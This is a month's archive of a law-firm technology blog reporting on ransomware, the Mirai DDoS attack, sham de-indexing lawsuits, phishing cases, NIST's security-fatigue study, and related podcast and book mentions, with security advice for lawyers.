October 2016

October 31, 2016

As a Wall Street Journalblog reported, ransomware has exploded, the attacks more sophisticated as hackers are encouraged by the percentage of victim who pay the ransom. Insurance underwriter Beazley released a report last Thursday in which it said ransomware attacks will be four times higher in 2016 than last year.

Sadly, hackers don't need technical expertise because they can easily buy a ransomware kit and put it to use.

Companies that are victims of these attacks aren't given a pass by the authorities. They still may have to report such incidents to regulators and may have to issue data breach notifications, even if no data are removed, said Lisa Sotto, a partner at law firm Hunton & Williams. "I wouldn't expect regulators to be terribly forgiving," she said.

And this is why we preach endlessly that you must have one good backup that is never connected to the network. Ransomware is so attractive these days that cybercriminals can make more with ransomware than they can by selling personal data on the dark web.

Last week, we lectured to a group of lawyers in Emporia, Virginia, where most of the law firms tend to be quite small. At the end of the presentation, two lawyers approached us to tell us that their small firms had been successfully attacked. Both paid the ransom. One of the lawyers was kind enough to tell us that his firm paid $3000. Affordable to a small firm, but hardly chump change – and they were out of business for eight days. Ouch, ouch, ouch – that's a lot more than $3000 lost!

October 27, 2016

SC Magazinereported yesterday that Flashpoint researchers say the Mirai DDOS attack that took down PayPal, Twitter, Reddit, GitHub, Amazon, Netflix, Spotify and Runescape was initiated by users from hackforums[.]net and not a nation-state or cybercriminal organization.

The Flashpoint researchers said that these hackers are known for creating and using commercial DDoS tools and offering their services online as a "DDoS for hire" service.

The attack began last Friday morning hitting three Dyn data centers in the northeastern U.S., which localized the damage for a time. What was remarkable about the attack is how effectively it utilized Internet of Things devices, including routers, cameras and DVR recorders with default IDs and passwords, easily compromised with the Marai IoT botnet malware.

If nothing else, it was a wake-up call to all IoT manufacturers, and hopefully users, to be more proactive with their security.

October 26, 2016

Ars Technica carried a startling story yesterday about two California lawyers accused of filing "sham lawsuits" in a wide-ranging conspiracy to get Google and other search engines to de-index negative reviews about their clients. As the case (PDF) brought by a group called Consumer Opinion states:

"The other conspirators engaged attorneys Mark W. Lapham ("Lapham") and Owen T. Mascott ("Mascott") to file sham lawsuits either by the subjects of the negative reviews or by corporations that had no interest in the allegedly defamatory statements, against a defendant who most certainly was not the party that published the allegedly defamatory statements, and the parties immediately stipulated to a judgment of injunctive relief, so the conspirators could provide the order to Google and other search engines, thus achieving the goal of deindexing all pages containing negative reviews."

Consumer Opinion runs pissedconsumer.com, and the group says these lawyers manipulated California's legal system by conducting a "rather brilliant but incredibly unethical" scheme to make negative reviews on the site essentially disappear from search results. The suit asks a federal judge to "discipline them for those misdeeds."

The suit notes a complex web of reputation companies and fake or "stooge" defendants working together. According to the lawsuit, it works like this: the attorneys sue the "stooge" authors of negative reviews—allegedly defamatory reviews that are published on the pissedconsumer.com site. But these lawsuit defendants didn't actually write the review, and the suits immediately settle. The judgments are then used to get Yahoo, Google, and Bing to erase negative reviews from search results. The suit alleges that a Florida attorney, the subject of some 59 negative reviews on pissedconsumer.com, was among the beneficiaries of the alleged scheme.

Yikes. If true, these attorneys are headed for all kinds of trouble – I can only imagine how the state bar disciplinary folks would view such conduct.

Apparently, this isn't the first time we've seen these type of allegedly fake lawsuits try to game search results, according to Paul Alan Levy of Public Citizen and Eugene Volokh of the Volokh Conspiracy. The duo has concluded that there are at least 25 cases nationwide with what they call a "suspicious profile."

"Of these 25-odd cases, 15 give the addresses of the defendants—but a private investigator hired by Professor Volokh (Giles Miller of Lynx Insights & Investigations) couldn't find a single one of the ostensible defendants at the ostensible address," they wrote. As they point out, search engines presented with a court order "can't really know if the injunction was issued against the actual author of the supposed defamation—or against a real person at all."

This kind of gaming the system is deplorable – and the involvement of lawyers, if proven, is a disgrace.

October 25, 2016

Naked Security reported on a phishing e-mails in a story you should really read. The tale involves a man whose solicitor's e-mail account had been hacked. He then received an e-mail from the solicitor's real (not spoofed) e-mail address, including his normal e-mail signature. As the recipient was in the middle of moving to a new home and expected paperwork from his solicitor, the e-mail and attachment appeared normal at first.

But as he moved his cursor to open the attachment, he noticed the attachment was called Drafted Contract003.pdf.htm – a clever use of the double extension .pdf.htm which was an attempt to trick him into thinking that this was a PDF document instead of the HTM (web page) file that it actually was.

On opening the file, instead of a PDF viewer launching, his browser opened with a popup alert: After closing the alert, he was taken to a very realistic looking Google login page. But the address bar revealed that the address wasn't Google or even a website URL, but code included in HTM file, which he could see when he opened the HTM in text editor. If you looked at the source code of this page in a browser, you could see that any user who enters their username and password would have those details submitted to the hacker and not Google.

At this point, he contacted his solicitor and alerted him to the fact that his e-mail account had been compromised and it was sending phishing e-mails. The solicitor changed his password and contacted his clients to advise them to be on the lookout for suspicious e-mails.

It is worth reading the story simply to see all the graphics that accompany the narrative above.

This wasn't the end of the attack. The next day, he received another e-mail purportedly from the same solicitor, with the same signature, but this one came from a random Gmail address. This time it had a real PDF file attached called Financial Statements001.pdf. On opening this file, a blurry picture appeared with a link at the top.

The blurring was deliberate by the cybercriminal, leaving only the Barclays bank logo and an 'Approved' stamp legible. The idea is to trick you into thinking you had been approved for some kind of contract or loan and that if you click the link at the top you would be able to view the details.

In reality, clicking the link took you to a web page hosted on the same domain as the previous phishing e-mail, which again requires you to 'log in' on a fake Google page. Looking at the Whois ownership information for that domain, he saw that it had been registered one week earlier using presumably fake or stolen personal details of a woman called Fiona in Lagos, Nigeria.

He surmised at this point that the hacker had not only gotten into his solicitor's e-mail account but also stolen all the contact details in his address book. This allowed the attacker to continue targeting him and other customers using the same details but from different e-mail addresses.

He contacted his solicitor again to try and understand if he knew how his account had been hacked and what else had happened. It came as no surprise that he had recently received a similar e-mail that had tricked him into entering Google login credentials. So he was phished, which led to the account compromise.

Now he wanted to understand the purpose behind the actions of the crook: was he just after usernames and passwords to sell on the Dark Web? The answer was derived from the filters on the solicitor's e-mail account.

He had twenty new e-mail filters named A, B, C… all the way through to T. Most of these had a similar theme: any e-mail containing a keyword in the subject or message, such as Bank, Statement, or Sort Code would be moved into a Recently Deleted folder.

For hackers working against the clock, aware that the victim could change their password at any moment, this would make it very quick for them to get hold of the most valuable e-mails and save them for further investigation later.

The last few filters targeted e-mails that contained references to Contract003.pdf.htm. These would be automatically dumped into the Spam folder. This meant that anyone who tried to warn the solicitor that he had been hacked by sending him an e-mail would fail – they would have vanished into his Spam folder and never been seen, giving the hacker more time to keep the scam going.

To protect yourself from e-mails sent under false pretenses by crooks, the author offers the following advice:

Look out for e-mails that come from different addresses to what you'd expect.

Be careful of documents that ask you to enable macros or editing before you can see the contents.

Tell Windows Explorer to show file extensions to protect you against misleading filenames.

October 24, 2016

The e-mail saying that your Gmail account may have been compromised conveniently contains a link or button for you to click on to remedy the problem. Slow down and think. According to an Ars Technicastory, this is exactly how the breaches of the Democratic National Committee and the personal e-mail breaches of former Secretary of State Colin Powell and Clinton Campaign Chairman John Podesta took place.

The spear-phishing attack used custom-coded Bit.ly shortened URLs containing the e-mail addresses of their victims. The URLs appeared in e-mails disguised to look like warnings from Google about the victims' accounts. Crafty, and as the story notes, it is pretty well confirmed that these bogus warnings came from Russian intelligence or one of their hacking minions.

So, to tell a story on myself, I got a Google e-mail warning that a previously unknown device was accessing my Google account via Internet Explorer, which I do not use. There was a link to view recent activity on my account.

So what do you do? In my case (and it pains me to admit this), I had never gotten around to enabling two-factor authentication on my Gmail account. I am hanging my head in shame. "The cobbler's children have no shoes," right?

Now, we use Mimecast to detect malware and Mimecast did not see a problem with the link, so it may have been real. But the cautious approach is to log directly into your Gmail account, change your password and enable two-factor authentication (in My Account, Sign-in and Security).

Enabling two-factor authentication had been a task that I just kept pushing until another day in Outlook. With as many of these targeted phishing e-mails as we've seen recently, the time for delay is at an end. Wherever you have private information, ensure your privacy by enabling two-factor authentication if it is available.

The worst part of the experience was the ribbing I took from John, who will no doubt continue the ribbing publicly in our CLEs. And to think I brought this on myself . . .

October 20, 2016

As I mentioned in Monday's blog post, users are suffering from a major case of security fatigue. A recent study from the National Institute of Standards and Technology (NIST) backs that up.

A majority of the typical computer users interviewed experienced security fatigue that leads them to risky computing behavior at work and in their personal lives. Security fatigue is defined in the study as a weariness or reluctance to deal with computer security.

The multidisciplinary team learned that the majority of their average computer users felt overwhelmed and bombarded, and they got tired of being on constant alert, adopting safe behavior, and trying to understand the nuances of online security issues.

Researchers found that the result of weariness leads to feelings of resignation and loss of control. These reactions can lead to avoiding decisions, choosing the easiest option among alternatives, making decisions influenced by immediate motivations, behaving impulsively, and failing to follow security rules.

The data provided evidence for three ways to ease security fatigue and help users maintain secure online habits and behavior. They are:

Limit the number of security decisions users need to make;

Make it simple for users to choose the right security action; and

Design for consistent decision making whenever possible.

Every time we lecture, we hear about security fatigue from audiences, though it goes by many names. The bottom line is that we have to design systems that allow the user to be foolish without getting hurt – the systems themselves must bear the brunt of achieving security. Needless to say, we have a long ways to go in achieving that goal.

October 19, 2016

Our new Legal Talk Network Digital Detectivespodcast tackles what was, for us, a brand new topic, the importance of website security for law firms. Our guest was Neill Feather, the President of SiteLock, a firm which specializes in website security.

Disclosure: SiteLock is a sponsor of Digital Detectives.

For many years, we have advised law firms not to host their own websites. Some years ago, one client decided to ignore our advice. The managing partner came to work one day to find that the law firm website home page said "F*** the U.S. Government!" Not precisely the best message for a law firm website!

One of the most significant digital assets a law firm has is its website – and yet, many firms do not think about the security of their website. Take a listen as Neill describes why people compromise websites, how they do it and how you can protect yourself.

Neill gave us quite an education – we knew some of what he told us, but much of what he talked about drilled down further than we had gone before and illuminated this subject in a very helpful way. This will be a very informative podcast for most law firms – and other entities as well.

October 18, 2016

I am pleased to deviate from my normal subject matter to introduce a new book by my friend Merrilyn Tarlton (of Attorney at Work fame – you'll want to subscribe to that blog if you don't already). Entitled Getting Clients: For Lawyers Starting Out or Starting Over, this book is really for any attorney at any stage of his/her career who is concerned about getting clients.

Merrilyn has been curating marketing knowledge and sharing it with clients for thirty years. If you click on the link, you'll see many of my colleagues heaping praise on this book as an indispensable guide. As my friend Jordan Furlong says, the book delivers on the promise of its title.

The book is just $40.00 with 10% off if you order by October 31st – enter the code "GettingClients10".

October 17, 2016

After taking a week off to recover from a hip replacement – and learning that my doctor was right when he said I would need two weeks – RTL is back though a chastened patient remains at home.

It is with delight that I share an excellent article from my friend Dave Ries, written by the very blunt cybersecurity guru Bruce Schneier. He maintains, correctly I think, that we need to stop blaming the user for not being sufficiently educated about security. No wonder NIST and others have found "security fatigue" among users. So many things we want them to know and remember when simply need answers or want to get a task done!

Bruce points out that the interminable warnings users see have an inevitable consequence: As he says, they don't see "the certificate has expired; are you sure you want to go to this webpage? They see, "I'm an annoying message preventing you from reading a webpage. Click here to get rid of me."

How many times have we all done that?

We need to stop blaming users and making computing more secure no matter what the user does. Automatic updates and running programs in sandboxes are perfect examples – we need more of them.

Sensei Enterprises, Inc.

3975 University Drive
Suite 225
Fairfax, VA 22030
703.359.0700

Disclaimer

This blog is intended to impart general information and does not offer specific legal advice. Use of this blog does not create an attorney-client relationship. If you require legal advice, consult an attorney.